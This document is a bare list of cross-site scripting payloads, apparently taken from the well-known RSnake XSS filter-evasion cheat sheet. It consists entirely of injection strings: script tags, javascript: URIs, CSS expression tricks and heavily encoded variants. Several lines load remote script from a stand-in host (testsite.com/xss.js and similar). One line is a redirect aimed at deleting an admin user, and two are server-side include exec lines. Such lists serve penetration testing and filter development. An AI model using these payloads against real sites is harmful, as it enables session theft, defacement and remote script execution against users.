';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} 
'';!--"<XSS>=&{()} 
<SCRIPT>alert('XSS')</SCRIPT> 
<SCRIPT SRC=http://testsite.com/xss.js></SCRIPT> 
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
<BASE HREF="javascript:alert('XSS');//"> 
<BGSOUND SRC="javascript:alert('XSS');"> 
<BODY BACKGROUND="javascript:alert('XSS');"> 
<BODY ONLOAD=alert('XSS')> 
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> 
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> 
<DIV STYLE="width: expression(alert('XSS'));"> 
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> 
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> 
<IMG SRC="javascript:alert('XSS');"> 
<IMG SRC=javascript:alert('XSS')> 
<IMG DYNSRC="javascript:alert('XSS');"> 
<IMG LOWSRC="javascript:alert('XSS');"> 
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> 
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser 
exp/*<XSS STYLE='no\xss:noxss("*//*"); xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> 
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS 
<IMG SRC='vbscript:msgbox("XSS")'> 
<LAYER SRC="http://testsite.com/scriptlet.html"></LAYER> 
<IMG SRC="livescript:[code]"> 
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE 
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> 
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> 
<IMG SRC="mocha:[code]"> 
<OBJECT TYPE="text/x-scriptlet" DATA="http://testsite.com/scriptlet.html"></OBJECT> 
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> 
<EMBED SRC="http://testsite.com/xss.swf" AllowScriptAccess="always"></EMBED> 
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d); 
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> 
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> 
<XSS STYLE="xss:expression(alert('XSS'))"> 
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> 
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> 
<LINK REL="stylesheet" HREF="http://testsite.com/xss.css"> 
<STYLE>@import'http://testsite.com/xss.css';</STYLE> 
<META HTTP-EQUIV="Link" Content="<http://testsite.com/xss.css>; REL=stylesheet"> 
<STYLE>BODY{-moz-binding:url("http://testsite.com/xssmoz.xml#xss")}</STYLE> 
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> 
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> 
<HTML xmlns:xss> <?import namespace="xss" implementation="http://testsite.com/xss.htc"> <xss:xss>XSS</xss:xss> </HTML> 
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> 
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> 
<XML SRC="http://testsite.com/xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 
<HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML> 
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> 
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> 
<XSS STYLE="behavior: url(http://testsite.com/xss.htc);"> 
<SCRIPT SRC="http://testsite.com/xss.jpg"></SCRIPT> 
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://testsite.com/xss.js></SCRIPT>'"--> 
<? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?> 
<BR SIZE="&{alert('XSS')}"> 
< %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &#60; &#060; &#0060; &#00060; &#000060; &#0000060; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; \x3c \x3C \u003c \u003C 
<IMG SRC=JaVaScRiPt:alert('XSS')> 
<IMG SRC=javascript:alert(&quot;XSS&quot;)> 
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> 
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> 
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> 
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> 
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> 
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> 
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- 
\";alert('XSS');// 
</TITLE><SCRIPT>alert("XSS");</SCRIPT> 
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> 
<IMG SRC="jav ascript:alert('XSS');"> 
<IMG SRC="jav&#x09;ascript:alert('XSS');"> 
<IMG SRC="jav&#x0A;ascript:alert('XSS');"> 
<IMG SRC="jav&#x0D;ascript:alert('XSS');"> 
<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > 
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out 
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out 
<IMG SRC=" &#14; javascript:alert('XSS');"> 
<SCRIPT/XSS SRC="http://testsite.com/xss.js"></SCRIPT> 
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> 
<SCRIPT SRC=http://testsite.com/xss.js 
<SCRIPT SRC=//testsite.com/.j> 
<IMG SRC="javascript:alert('XSS')" 
<IFRAME SRC=http://testsite.com/scriptlet.html < 
<<SCRIPT>alert("XSS");//<</SCRIPT> 
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> 
<P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">
<SCRIPT a=">" SRC="http://testsite.com/xss.js"></SCRIPT> 
<SCRIPT ="blah" SRC="http://testsite.com/xss.js"></SCRIPT> 
<SCRIPT a="blah" '' SRC="http://testsite.com/xss.js"></SCRIPT> 
<SCRIPT "a='>'" SRC="http://testsite.com/xss.js"></SCRIPT> 
<SCRIPT a=`>` SRC="http://testsite.com/xss.js"></SCRIPT> 
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://testsite.com/xss.js"></SCRIPT> 
<SCRIPT a=">'>" SRC="http://testsite.com/xss.js"></SCRIPT> 
<A HREF="http://12.12.12.123/">XSS</A> 
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> 
<A HREF="http://1231231213/">XSS</A> 
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> 
<A HREF="http://0102.0146.0007.00000223/">XSS</A> 
<A HREF="h tt p://1&#09;6.000126.0x7.217/">XSS</A> 
<A HREF="//www.microsoft.com/">XSS</A> 
<A HREF="//google">XSS</A> 
<A HREF="http://testsite.com@google">XSS</A> 
<A HREF="http://google:testsite.com">XSS</A> 
<A HREF="http://google.com/">XSS</A> 
<A HREF="http://www.microsoft.com./">XSS</A> 
<A HREF="javascript:document.location='http://www.microsoft.com/'">XSS</A> 
<A HREF="http://www.gohttp://www.microsoft.com/ogle.com/">XSS</A> 
